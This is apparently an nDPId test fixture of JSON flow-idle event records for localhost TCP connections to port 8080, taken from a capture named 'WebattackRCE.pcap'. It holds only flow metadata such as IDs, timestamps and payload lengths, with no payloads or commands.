-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":661,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277762,"flow_last_seen":1576420277762,"flow_idle_time":7440000,"flow_min_l4_payload_len":304,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":304,"flow_avg_l4_payload_len":304,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50884,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":662,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277764,"flow_last_seen":1576420277764,"flow_idle_time":7440000,"flow_min_l4_payload_len":297,"flow_max_l4_payload_len":297,"flow_tot_l4_payload_len":297,"flow_avg_l4_payload_len":297,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50886,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":663,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277766,"flow_last_seen":1576420277766,"flow_idle_time":7440000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50888,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":664,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277767,"flow_last_seen":1576420277767,"flow_idle_time":7440000,"flow_min_l4_payload_len":311,"flow_max_l4_payload_len":311,"flow_tot_l4_payload_len":311,"flow_avg_l4_payload_len":311,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50890,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":665,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277769,"flow_last_seen":1576420277769,"flow_idle_time":7440000,"flow_min_l4_payload_len":305,"flow_max_l4_payload_len":305,"flow_tot_l4_payload_len":305,"flow_avg_l4_payload_len":305,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50892,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":666,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277770,"flow_last_seen":1576420277770,"flow_idle_time":7440000,"flow_min_l4_payload_len":303,"flow_max_l4_payload_len":303,"flow_tot_l4_payload_len":303,"flow_avg_l4_payload_len":303,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50894,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":667,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277772,"flow_last_seen":1576420277772,"flow_idle_time":7440000,"flow_min_l4_payload_len":303,"flow_max_l4_payload_len":303,"flow_tot_l4_payload_len":303,"flow_avg_l4_payload_len":303,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50896,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":668,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277773,"flow_last_seen":1576420277773,"flow_idle_time":7440000,"flow_min_l4_payload_len":298,"flow_max_l4_payload_len":298,"flow_tot_l4_payload_len":298,"flow_avg_l4_payload_len":298,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50898,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":669,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277776,"flow_last_seen":1576420277776,"flow_idle_time":7440000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50900,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":670,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277777,"flow_last_seen":1576420277777,"flow_idle_time":7440000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":312,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50902,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":671,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277778,"flow_last_seen":1576420277778,"flow_idle_time":7440000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50904,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":672,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277780,"flow_last_seen":1576420277780,"flow_idle_time":7440000,"flow_min_l4_payload_len":304,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":304,"flow_avg_l4_payload_len":304,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50906,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":673,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277781,"flow_last_seen":1576420277781,"flow_idle_time":7440000,"flow_min_l4_payload_len":304,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":304,"flow_avg_l4_payload_len":304,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50908,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":674,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277782,"flow_last_seen":1576420277782,"flow_idle_time":7440000,"flow_min_l4_payload_len":274,"flow_max_l4_payload_len":274,"flow_tot_l4_payload_len":274,"flow_avg_l4_payload_len":274,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50910,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":675,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277784,"flow_last_seen":1576420277784,"flow_idle_time":7440000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50912,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":676,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277785,"flow_last_seen":1576420277785,"flow_idle_time":7440000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":288,"flow_tot_l4_payload_len":288,"flow_avg_l4_payload_len":288,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50914,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":677,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277786,"flow_last_seen":1576420277786,"flow_idle_time":7440000,"flow_min_l4_payload_len":282,"flow_max_l4_payload_len":282,"flow_tot_l4_payload_len":282,"flow_avg_l4_payload_len":282,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50916,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":678,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277788,"flow_last_seen":1576420277788,"flow_idle_time":7440000,"flow_min_l4_payload_len":280,"flow_max_l4_payload_len":280,"flow_tot_l4_payload_len":280,"flow_avg_l4_payload_len":280,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50918,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":679,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277790,"flow_last_seen":1576420277790,"flow_idle_time":7440000,"flow_min_l4_payload_len":280,"flow_max_l4_payload_len":280,"flow_tot_l4_payload_len":280,"flow_avg_l4_payload_len":280,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50920,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":680,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277792,"flow_last_seen":1576420277792,"flow_idle_time":7440000,"flow_min_l4_payload_len":299,"flow_max_l4_payload_len":299,"flow_tot_l4_payload_len":299,"flow_avg_l4_payload_len":299,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50922,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":681,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277794,"flow_last_seen":1576420277794,"flow_idle_time":7440000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50924,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":682,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277795,"flow_last_seen":1576420277795,"flow_idle_time":7440000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50926,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":683,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277797,"flow_last_seen":1576420277797,"flow_idle_time":7440000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50928,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":684,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277799,"flow_last_seen":1576420277799,"flow_idle_time":7440000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50930,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":685,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277800,"flow_last_seen":1576420277800,"flow_idle_time":7440000,"flow_min_l4_payload_len":315,"flow_max_l4_payload_len":315,"flow_tot_l4_payload_len":315,"flow_avg_l4_payload_len":315,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50932,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":686,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277802,"flow_last_seen":1576420277802,"flow_idle_time":7440000,"flow_min_l4_payload_len":320,"flow_max_l4_payload_len":320,"flow_tot_l4_payload_len":320,"flow_avg_l4_payload_len":320,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50934,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":687,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277803,"flow_last_seen":1576420277803,"flow_idle_time":7440000,"flow_min_l4_payload_len":314,"flow_max_l4_payload_len":314,"flow_tot_l4_payload_len":314,"flow_avg_l4_payload_len":314,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50936,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":688,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277804,"flow_last_seen":1576420277804,"flow_idle_time":7440000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":312,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50938,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":689,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277807,"flow_last_seen":1576420277807,"flow_idle_time":7440000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":312,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50940,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":690,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277808,"flow_last_seen":1576420277808,"flow_idle_time":7440000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50942,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":691,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277810,"flow_last_seen":1576420277810,"flow_idle_time":7440000,"flow_min_l4_payload_len":316,"flow_max_l4_payload_len":316,"flow_tot_l4_payload_len":316,"flow_avg_l4_payload_len":316,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50944,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":692,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277811,"flow_last_seen":1576420277811,"flow_idle_time":7440000,"flow_min_l4_payload_len":321,"flow_max_l4_payload_len":321,"flow_tot_l4_payload_len":321,"flow_avg_l4_payload_len":321,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50946,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":693,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277812,"flow_last_seen":1576420277812,"flow_idle_time":7440000,"flow_min_l4_payload_len":315,"flow_max_l4_payload_len":315,"flow_tot_l4_payload_len":315,"flow_avg_l4_payload_len":315,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50948,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":694,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277813,"flow_last_seen":1576420277813,"flow_idle_time":7440000,"flow_min_l4_payload_len":313,"flow_max_l4_payload_len":313,"flow_tot_l4_payload_len":313,"flow_avg_l4_payload_len":313,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50950,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":695,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277814,"flow_last_seen":1576420277814,"flow_idle_time":7440000,"flow_min_l4_payload_len":313,"flow_max_l4_payload_len":313,"flow_tot_l4_payload_len":313,"flow_avg_l4_payload_len":313,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50952,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":696,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277816,"flow_last_seen":1576420277816,"flow_idle_time":7440000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50954,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":697,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277817,"flow_last_seen":1576420277817,"flow_idle_time":7440000,"flow_min_l4_payload_len":315,"flow_max_l4_payload_len":315,"flow_tot_l4_payload_len":315,"flow_avg_l4_payload_len":315,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50956,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":698,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277819,"flow_last_seen":1576420277819,"flow_idle_time":7440000,"flow_min_l4_payload_len":320,"flow_max_l4_payload_len":320,"flow_tot_l4_payload_len":320,"flow_avg_l4_payload_len":320,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50958,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":699,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277821,"flow_last_seen":1576420277821,"flow_idle_time":7440000,"flow_min_l4_payload_len":314,"flow_max_l4_payload_len":314,"flow_tot_l4_payload_len":314,"flow_avg_l4_payload_len":314,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50960,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":700,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277822,"flow_last_seen":1576420277822,"flow_idle_time":7440000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":312,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50962,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":701,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277824,"flow_last_seen":1576420277824,"flow_idle_time":7440000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":312,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50964,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":702,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277827,"flow_last_seen":1576420277827,"flow_idle_time":7440000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50966,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":703,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277828,"flow_last_seen":1576420277828,"flow_idle_time":7440000,"flow_min_l4_payload_len":316,"flow_max_l4_payload_len":316,"flow_tot_l4_payload_len":316,"flow_avg_l4_payload_len":316,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50968,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":704,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277829,"flow_last_seen":1576420277829,"flow_idle_time":7440000,"flow_min_l4_payload_len":321,"flow_max_l4_payload_len":321,"flow_tot_l4_payload_len":321,"flow_avg_l4_payload_len":321,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50970,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":705,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277831,"flow_last_seen":1576420277831,"flow_idle_time":7440000,"flow_min_l4_payload_len":315,"flow_max_l4_payload_len":315,"flow_tot_l4_payload_len":315,"flow_avg_l4_payload_len":315,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50972,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":706,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277832,"flow_last_seen":1576420277832,"flow_idle_time":7440000,"flow_min_l4_payload_len":313,"flow_max_l4_payload_len":313,"flow_tot_l4_payload_len":313,"flow_avg_l4_payload_len":313,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50974,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":707,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277834,"flow_last_seen":1576420277834,"flow_idle_time":7440000,"flow_min_l4_payload_len":313,"flow_max_l4_payload_len":313,"flow_tot_l4_payload_len":313,"flow_avg_l4_payload_len":313,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50976,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 